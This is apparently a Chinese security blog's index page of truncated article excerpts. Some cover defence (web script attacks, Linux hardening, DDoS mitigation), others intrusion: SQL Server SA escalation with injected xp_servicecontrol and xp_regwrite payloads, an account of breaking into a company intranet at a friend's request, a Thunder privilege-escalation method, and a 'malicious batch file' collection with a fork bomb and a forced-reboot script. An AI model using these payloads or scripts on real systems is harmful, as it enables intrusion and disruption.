防范脚本入侵 你做好准备了吗?

05年写的一篇文章。

作为网络管理员,不少朋友也同时负责单位的网站开发维护的工作,对于WEB开发我想大家都比较精通,可是对如何编写安全的脚本代码和入侵者如何通过WEB方式对服务器进行渗透的,可能就不是很清楚了,有不少朋友错误的认为我的服务器有硬件防火墙,而且只开了80端口,是不会有网络安全问题的。下面我就向大家介绍几种比较常见的脚本攻击的方法,让大家从中能够找到安全防护的方法,从而提高服务器的安全性。

...

标签:

由渗透扫描到实施路由器跳板攻击

最近一直有人在问我学习网络安全有什么捷径没有,说他参加了很多培训班,上过不少课,也交了不少钱,但到现在自己真正掌握的东西很少,自己也感到很迷茫。

关于这个问题有很多解释和问题,我想最关键的东西就是他没有自己“原创”的东西,拿来主义固然好,如果没有消化,没有转化为自己的东西,学猴子掰苞谷,掰一个丢一个,最后手中什么也没有。

网络安全最大的特点就是研究和实践,唯有研究才能深入,才能掌握它的精髓;唯有实践你才能真正的了解它,掌握它。其实写本文完全是来自一个项目,一个网络安全渗透项目,在渗透测试过程中我发现了这个问题,通过研究和思考,所有有了这篇文章,写出来跟大家分享,大牛们可以直接Pass,呵呵。本文就按照实际操作流程来介绍吧。

...

标签:

一次SA权限入侵和小议SA提权

尝试在NB里面恢复CMDSHELL、OACREAT都没有成功,所以开启SQLSERVERAGENT

;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';--还是没有成功,无奈之中希望寄托于沙盒模式,执行如下语句开启沙盒模式


;execmaster..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
...

标签:

数字战场:VPN隧道攻击

前言
~~~~~
公司对于在不安全的公网上安全地通信的需求在日益增加。这些用户从家里、旅馆和其他工作场所之外的地方连接到内部公司资源。目前有多种不同的VPN实现,使用最广泛的是IPsec、PPTP和SSL VPN实现。此外,还有两种常规的加密VPN类型,一种提供远程访问,一种提供点到站点连接。

我需要提醒的是,你对目标机构执行我所演示的内容之前,请获取组织打印的书面许可证件,以避免丢掉你的工作甚至得到坐牢的回报。

...

标签:

Linux系统安全维护

       无论你是Linux的普通桌面用户还是管理多个服务器的系统管理员,你都面临着同样的问题:日益增加的各种威胁。Linux是一个开放式系统,可以在网络上找到许多现成的程序和工具,这既方便了用户,也方便了黑客,因为他们也能很容易地找到程序和工具来潜入Linux系统,或者盗取Linux系统上的重要信息。不过,只要我们仔细地设定Linux的各种系统功能,并且加上必要的安全措施,就能让黑客们无机可乘。

  一般来说,对Linux系统的安全设定包括取消不必要的服务、限制远程存取、隐藏重要资料、修补安全漏洞、采用安全工具以及经常性的安全检查等。本文教你十种提高Linux系统安全性的招数。虽然招数不大,但招招奏效,你不妨一试。

...

标签:

【转载】渗透国内知名公司内部局域网经过

本文的目标是一国内知名公司的网络,本文图片、文字都经过处理,均为伪造,如有雷同,纯属巧合。
最近一个网友要我帮他拿他们公司内网一项重要的文件,公司网络信息朋友都mail给我了,这些信息主要是几张网络拓扑图以及在内网嗅探到的信息(包括朋友所在的子网的设备用户名及密码等信息……)。参照以上信息总体整理了一下入侵的思路,如果在朋友机器安装木马,从内部连接我得到一个CMD Shell,须要精心伪装一些信息还有可能给朋友带来麻烦,所以选择在该网络的网站为突破口,而且管理员不会认为有“内鬼”的存在。
...

标签:

迅雷提权方法

当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,
把我们所下载东西添加到列表当中。
所对应的htm文件有2处一处是C:\Program Files\Thunder Network\Thunder\Program\geturl.htm
一处是C:\Program Files\Thunder Network\Thunder\Program\getAllurl.htm
如果我们想把我们想要的代码添加进去执行了?
...

标签:

各种入侵批处理

收集:X.DW's blog
链接:http://hi.baidu.com/hkxdw
第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0

就这3行了


第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
...

标签:

关于sqldebugger和TsInternetUser系统用户

经常看到网友在网上发帖问sqldebugger、TsInternetUser这个两个用户究竟是什么,是否是正常的系统用户,我觉得不少情况下这个用户都被人利用了,也就是说你可能已经被人入侵了。

TsInternetUser这个用户资料很少,我也没怎么接触过,不知道是怎么生成的,这里主要介绍sqldebugger这个系统用户。安装完sqlserver后,确实可能创建一个sqldebugger用户,如果你没有装sqlserver,系统突然出现这个用户,那一般是被黑了,因为系统出现莫名其妙的用户后,我们会利用搜索引擎查一下,但搜索引擎会告诉我们这个用户确实可能存在,下面有两个方法鉴别这个用户是否已经别人利用了:

标签:

防范DDoS攻击

几乎所有的主机平台都有抵御DDoS的设置。以Linux操作系统为例,其防范技术主要分为三大类,第一类是通过合理配置系统,达到资源最优化和利用最大化,第二类是通过加固TCP/IP协议栈来防范DDoS;第三类是通过防火墙、路由器等过滤网关,有效地探测攻击类型并阻击攻击。
必须明确的是,DDoS攻击在TCP连接原理上是合法的,除非TCP协议重新设计, 明确定义DDoS和其他正常请求有何不同,否则不可能完全阻止DDOS攻击,我们所做的只是尽可能地减轻DDoS攻击的危害。
1.服务器设置
...

标签: